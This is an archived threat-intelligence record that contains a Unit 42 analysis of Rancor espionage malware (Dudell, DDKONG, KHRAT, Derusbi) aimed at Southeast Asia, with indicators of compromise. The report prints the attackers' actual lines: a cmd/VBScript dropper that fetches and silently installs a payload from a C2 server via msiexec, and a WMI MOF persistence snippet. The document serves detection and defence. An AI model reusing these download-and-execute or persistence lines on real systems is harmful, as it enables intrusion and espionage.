{
	"id": "7d04b6ff-183f-42d5-8508-8e52f1a00bbf",
	"created_at": "2026-04-06T00:16:44.948811Z",
	"updated_at": "2026-04-10T03:36:18.528473Z",
	"deleted_at": null,
	"sha1_hash": "5b25a8a994e713bf9371f4f91afeeac9d04ec860",
	"title": "Rancor: Cyber Espionage Group Uses New Custom Malware to Attack Southeast Asia",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 185133,
	"plain_text": "Rancor: Cyber Espionage Group Uses New Custom Malware to Attack Southeast Asia\r\nBy Jen Miller-Osborn, Mike Harbison\r\nPublished: 2019-12-17 · Archived: 2026-04-05 17:57:53 UTC\r\nExecutive Summary\r\nIn late June 2018, Unit 42 revealed a previously unknown cyber espionage group we dubbed Rancor, which conducted targeted attacks in Southeast Asia throughout 2017 and 2018. In recent attacks, the group has persistently targeted at least one government organization in Cambodia from December 2018 through January 2019. While researching these attacks, we discovered an undocumented, custom malware family, which we’ve named Dudell. In addition, we discovered the group using Derusbi, a malware family believed to be unique to a small subset of Chinese cyber espionage groups.\r\nAttack Details\r\nBetween early December 2018 and the end of January 2019, Rancor conducted at least two rounds of attacks intending to install Derusbi or KHRat malware on victim systems. The January 2019 attacks were sent via 149.28.156[.]61 to deliver either Derusbi or KHRat samples, with either cswksfwq.kfesv[.]xyz or connect.bafunpda[.]xyz as C2.\r\nMalware Overview\r\nDUDELL\r\nSHA256 0d61d9baab9927bb484f3e60384fdb6a3709ca74bc6175ab16b220a68f2b349e\r\nFile Type Microsoft Excel 97 - 2003 Document\r\nFile Name Equipment Purchase List 2018-2020(Final).xls\r\nTable 1. DUDELL properties\r\nThe DUDELL sample is a weaponized Microsoft Excel document that contains a malicious macro that runs on the victim’s machine. It shares the same malicious behavior reported by Check Point in Rancor: The Year of The Phish (SHA-1 c829f5f9ff89210c888c1559bb085ec6e65232de). In Check Point’s blog, the sample is from December 2018, while this sample is from April 2018. 
It has the following metadata:\r\nCodepage 1252\r\nAuthor MS\r\nhttps://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/\r\nPage 1 of 9\n\nLast author MS\r\nApplication name Microsoft Excel\r\nCreation time Mon Oct 14 23:33:28 1996\r\nLast Save time Wed Apr 11 02:18:59 2018\r\nSecurity type 0\r\nTable 2. DUDELL file metadata\r\nThe macro in this document is executed when the user views the document and clicks Enable Content, at which point the macro locates and executes the data stored under the Company field in the document’s properties. The data under the Company field is:\r\ncmd /c set /p=Set v=CreateObject(^\"Wscript.Shell^\"):v.Run ^\"msiexec /q /i http://199.247.6[.]253/ud^\",false,0 \u003cnul \u003e C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs\r\nTable 3. Company field data\r\nThe C2 server 199.247.6[.]253 listed above in Table 3 is known to be used by the Rancor group. The script downloads a second stage payload via the Microsoft tool msiexec. Unfortunately, at the time of discovery the hosted file was unavailable. Our systems were able to record the hash of the file tmp.vbs, but the contents of the file are no longer available. See Table 5 below for hash values. Pivoting off the filename and directory, we discovered a similar VBS script used by the Rancor actors that might give us some clues on what the contents of tmp.vbs would resemble. The file office.vbs (SHA256: 4b0b319b58c2c0980390e24379a2e2a0a1e1a91d17a9d3e26be6f4a39a7afad2) was discovered in the directory c:\\Windows\\System32\\spool\\drivers\\color. The contents of that file are:\r\nSet v=CreateObject(\"Wscript.Shell\"):v.Run \"msiexec /q /i http://199.247.6[.]253/OFFICE\",false,0\r\nTable 4. Contents of office.vbs\r\nSHA256 b958e481c90939962081b9fb85451a2fb28f705d5b5060f5d9d5aebfb390f832\r\nTable 5. 
Hashes for tmp.vbs\r\nIf the file tmp.vbs does in fact contain content similar to that of office.vbs, then it could be another method for downloading payloads onto the target.\r\nDDKONG Plugin\r\nSHA256 0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707\r\nCompile Date and Time 2017-02-17 08:33:45 AM\r\nFile Type PE32 executable (DLL) Intel 80386, for MS Windows\r\nFile Name History.nls\r\nTable 6. DDKONG Plugin properties\r\nThe malware in question is configured with the following single export entry:\r\nDllInstall\r\nThe DllInstall export function is responsible for the core behavior of the malware, as just loading it does nothing. Once this export is called, it checks for a hidden window with a caption of Hello Google! and a class name of Google (see Figure 1 below). This check is performed to ensure that only one instance of the malware is running at a time.\r\nFigure 1. DDKONG Plugin hidden window properties\r\nThe hidden window created by the malware filters on any user input (e.g. keyboard or mouse activity). This could be an attempt to evade sandbox analysis, as mouse and keyboard movement is typically not performed in a sandbox. The malware then proceeds to beacon to a configured remote server of cswksfwq.kfesv[.]xyz on TCP port 8080. Upon successful connection, the malware transmits victim information such as hostname, IP address and Language Pack, along with other operating system information. The transmitted data is XOR encoded. 
The malware supports the following capabilities:\r\nTerminate specific process\r\nEnumerate processes\r\nUpload file\r\nDownload file\r\nDelete file\r\nList folder contents\r\nEnumerate storage volumes\r\nExecute a command\r\nReverse shell\r\nTake a screenshot\r\nKHRAT\r\nSHA256 aaebf987b8d80d71313c3c0f2c16d60874ffecbdda3bb6b44d6cba6d38031609\r\nCompile Date and Time 2018-05-02 05:22:23 PM\r\nFile Type PE32 executable (DLL) Intel 80386, for MS Windows\r\nFile Name 8081.dll\r\nTable 7. KHRAT properties\r\nThe malware in question is configured with the following single export entry:\r\nRmcmd\r\nWhen the DLL is initially loaded, it dynamically resolves and imports the additional modules (DLLs) it needs. Once loaded and the export entry Rmcmd is called, it creates a Windows mutex named gkdflbmdfk. This ensures that only one copy of the malware is running at a time. It then begins to beacon to a configured domain of connect.bafunpda[.]xyz on TCP port 8081. The malware collects and transmits data from the host, such as the hostname; the data is XOR encoded, with the first byte of the network traffic being the key. This malware supports the following capability:\r\nReverse Shell\r\nThe malware behavior and code share similarities with an older KHRAT sample from May 2018. That sample (SHA256: bc1c3e754be9f2175b718aba62174a550cdc3d98ab9c36671a58073140381659) has the same export entry name and is also a reverse shell. The newer sample appears to be a re-write for optimization purposes, with the underlying behavior remaining the same: a reverse shell.\r\nDerusbi\r\nSHA256 83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2abd9e0d\r\nCompile Date and Time 2012-09-14 09:20:12 AM\r\nFile Type PE32 executable (DLL) Intel 80386, for MS Windows\r\nFile Name 32.dll\r\nTable 8. 
Derusbi properties\r\nDerusbi is a backdoor Trojan believed to be used by a small group of attackers, which includes the Rancor group. This particular sample is a loader that loads an encrypted payload for its functionality. The DLL requires the loading executable to supply a 32-byte key on the command line in order to decrypt the embedded payload, which unfortunately we do not have. Even though we don’t have the decryption key or the loader, we have uncovered some interesting artifacts:\r\nIf the module that loads the sample is named myapp.exe, the module will exit\r\nOnce loaded, it sleeps for six seconds\r\nLooks for a Windows pipe named \\\\.\\pipe\\_kernel32.dll.ntdll.dll.user32.dll\r\nLooks for a Windows device named \\Device\\acpi_010221\r\nCreates the following registry key: HKEY_CLASSES_ROOT\\CDO.SS_NNTPOnPostEarlySink.2, with two DWORD values named IDX and Ver\r\nSaves encrypted data at these keys\r\nThe cryptographic provider used to decrypt the embedded payload is MS_ENH_RSA_AES_PROV\r\nRancor VBScript\r\nIn July 2019, we discovered an interesting VBScript named Chrome.vbs (SHA256: 0C3D4DFA566F3064A8A408D3E1097C454662860BCACFB6675D2B72739CE449C2) associated with the Rancor group. This particular VBScript payload beacons to the domain bafunpda[.]xyz, which is also used by the KHRAT Trojan listed above in Table 7. This VBScript is obfuscated and contains packed data that is used to infect a target with multiple chained persistent artifacts. The following illustrates the behavior when the VBScript is executed:\r\nFigure 2. VBScript execution flow\r\nFigure 2 provides a visual overview of what happens when the VBScript is executed on a host. The script performs the following actions:\r\n1. Copies regsvr32.exe from %windir%\\syswow64 to %windir%\\spoolsw.exe.\r\n2. 
Creates a text file named vdfjgklffsdfmv.txt in the host’s %TMP% folder. This file is not actually a text file, but a Managed Object Format (MOF) file.\r\n3. Executes Windows mofcomp.exe, passing in the MOF file created in step 2.\r\n4. Adds data to two registry keys: classes and media. Data is saved in the default keys.\r\n5. Reads the blob of data from the registry key classes created in step 4 and saves the data to the file %windir%\\pla.dat.\r\nThe MOF file created by the VBScript is used as a persistence mechanism via Windows Management Instrumentation (WMI) Event Subscriptions. MOF files are compiled scripts that describe Common Information Model (CIM) classes, which are compiled into the WMI repository. The technique is described by MITRE ATT\u0026CK ID T1084. This particular MOF file creates a timer event that is triggered every five seconds. A snippet of the MOF file is illustrated in Figure 3 below:\r\ninstance of CommandLineEventConsumer as $Cons\r\n{\r\nName = \"SCM Event Log Filter\";\r\nRunInteractively=false;\r\nCommandLineTemplate=\"c:\\\\windows\\\\spoolsw.exe /s /n /i c:\\\\windows\\\\pla.dat\";\r\n};\r\ninstance of __EventFilter as $Filt\r\n{\r\nName = \"SCM Event Log Filter\";\r\nEventNamespace = \"Root\\\\Cimv2\";\r\nQuery = \"Select * From __InstanceModificationEvent \"\r\n\"Where TargetInstance Isa \\\"Win32_LocalTime\\\" \"\r\n\"And TargetInstance.Second = 5\";\r\nQueryLanguage = \"WQL\";\r\n};\r\nFigure 3. Snippet of MOF file\r\nFigure 3 shows the main functionality of the MOF file. It has a unique name of SCM Event Log Filter and runs spoolsw.exe every 5 seconds, with the /s /n /i parameters passing in the file pla.dat. If we recall from the VBScript earlier, spoolsw.exe is the host’s Windows regsvr32.exe. Regsvr32.exe is a Windows tool that registers a module (DLL). 
The parameters passed instruct regsvr32 not to display any message boxes (/s), not to call DllRegisterServer or DllUnregisterServer (/n), and to call DllInstall (/i). The file pla.dat therefore must be a DLL.\r\nThe registry values created by the VBScript are as follows:\r\n1. HKEY_CURRENT_USER\\Software\\Classes\r\nContains x86 code for a DLL. It is missing the first byte of 0x4, which is added by the VBScript when the file pla.dat is created.\r\nFile Properties for embedded registry data at HKEY_CURRENT_USER\\Software\\Classes\r\nSHA256 DB982B256843D8B6429AF24F766636BB0BF781B471922902D8DCF08D0C58511E\r\nCompile Date and Time 2018-04-24 10:51:14 PM\r\nFile Type PE32 executable (DLL) Intel 80386, for MS Windows\r\nExport Table DllInstall\r\nTable 9. Reg Classes embedded data properties\r\nThe DLL embedded in this registry key is a simple loader that loads the code from the registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Clients\\Media.\r\n2. HKEY_LOCAL_MACHINE\\SOFTWARE\\Clients\\Media\r\nContains shellcode and x86 code for a DLL. The data saved in the registry is encoded with a XOR key of 0x9C.\r\nSHA256 CC081FFEA6F4769733AF9D0BAE0308CA0AE63667FA225E7965DF0884E96E2D2A\r\nCompile Date and Time 2018-01-10 09:16:42 PM\r\nFile Type PE32 executable (DLL) Intel 80386, for MS Windows\r\nTable 10. Decoded media DLL data properties\r\nThe DLL located in the Media registry key is a variant of the KHRAT Trojan. It beacons to the domain connect.bafunpda[.]xyz and attempts to connect to TCP port 4433. 
This is the same domain used by the KHRAT Trojan listed above in Table 7, and the DLL shares the same behavior.\r\nConclusion\r\nRancor, a cyber espionage group active since at least 2017, continues to conduct targeted attacks in Southeast Asia and has been found using an undocumented, custom malware family, which we’ve dubbed Dudell, to download a second stage payload once its malicious macro is executed. Additionally, Rancor is using the Derusbi malware family to load a secondary payload once it infiltrates a target.\r\nPalo Alto Networks customers are protected from this threat. Our threat prevention platform detects these malware families with WildFire, while simultaneously updating the ‘malware’ category within the PAN-DB URL filtering solution for the compromised domains it has identified. AutoFocus customers can further investigate this activity with the following tags:\r\nRancor\r\nPLAINTEE\r\nDUDELL\r\nDerusbi\r\nIndicators of Compromise\r\nSHA256:\r\n0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707\r\nAAEBF987B8D80D71313C3C0F2C16D60874FFECBDDA3BB6B44D6CBA6D38031609\r\n0D61D9BAAB9927BB484F3E60384FDB6A3709CA74BC6175AB16B220A68F2B349E\r\nDB982B256843D8B6429AF24F766636BB0BF781B471922902D8DCF08D0C58511E\r\nCC081FFEA6F4769733AF9D0BAE0308CA0AE63667FA225E7965DF0884E96E2D2A\r\nBC1C3E754BE9F2175B718ABA62174A550CDC3D98AB9C36671A58073140381659\r\n83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2abd9e0d\r\nC2s\r\ncswksfwq.kfesv[.]xyz\r\nConnect.bafunpda[.]xyz\r\n199.247.6[.]253\r\nSource: https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/"
	],
	"report_names": [
		"rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia"
	],
	"threat_actors": [
		{
			"id": "e8aee970-e31e-489f-81c2-c23cd52e255c",
			"created_at": "2023-01-06T13:46:38.763687Z",
			"updated_at": "2026-04-10T02:00:03.092181Z",
			"deleted_at": null,
			"main_name": "RANCOR",
			"aliases": [
				"Rancor Group",
				"G0075",
				"Rancor Taurus",
				"Rancor group",
				"Rancor"
			],
			"source_name": "MISPGALAXY:RANCOR",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6d11e45c-4e31-4997-88f5-295b2564cfc6",
			"created_at": "2022-10-25T15:50:23.794721Z",
			"updated_at": "2026-04-10T02:00:05.358892Z",
			"deleted_at": null,
			"main_name": "Rancor",
			"aliases": [
				"Rancor"
			],
			"source_name": "MITRE:Rancor",
			"tools": [
				"DDKONG",
				"PLAINTEE",
				"certutil"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "416f8374-2b06-47e4-ba91-929b3f85d9bf",
			"created_at": "2022-10-25T16:07:24.093951Z",
			"updated_at": "2026-04-10T02:00:04.864244Z",
			"deleted_at": null,
			"main_name": "Rancor",
			"aliases": [
				"G0075",
				"Rancor Group",
				"Rancor Taurus"
			],
			"source_name": "ETDA:Rancor",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"DDKONG",
				"Derusbi",
				"Dudell",
				"ExDudell",
				"KHRAT",
				"PLAINTEE",
				"RoyalRoad",
				"certutil",
				"certutil.exe",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434604,
	"ts_updated_at": 1775792178,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5b25a8a994e713bf9371f4f91afeeac9d04ec860.pdf",
		"text": "https://archive.orkl.eu/5b25a8a994e713bf9371f4f91afeeac9d04ec860.txt",
		"img": "https://archive.orkl.eu/5b25a8a994e713bf9371f4f91afeeac9d04ec860.jpg"
	}
}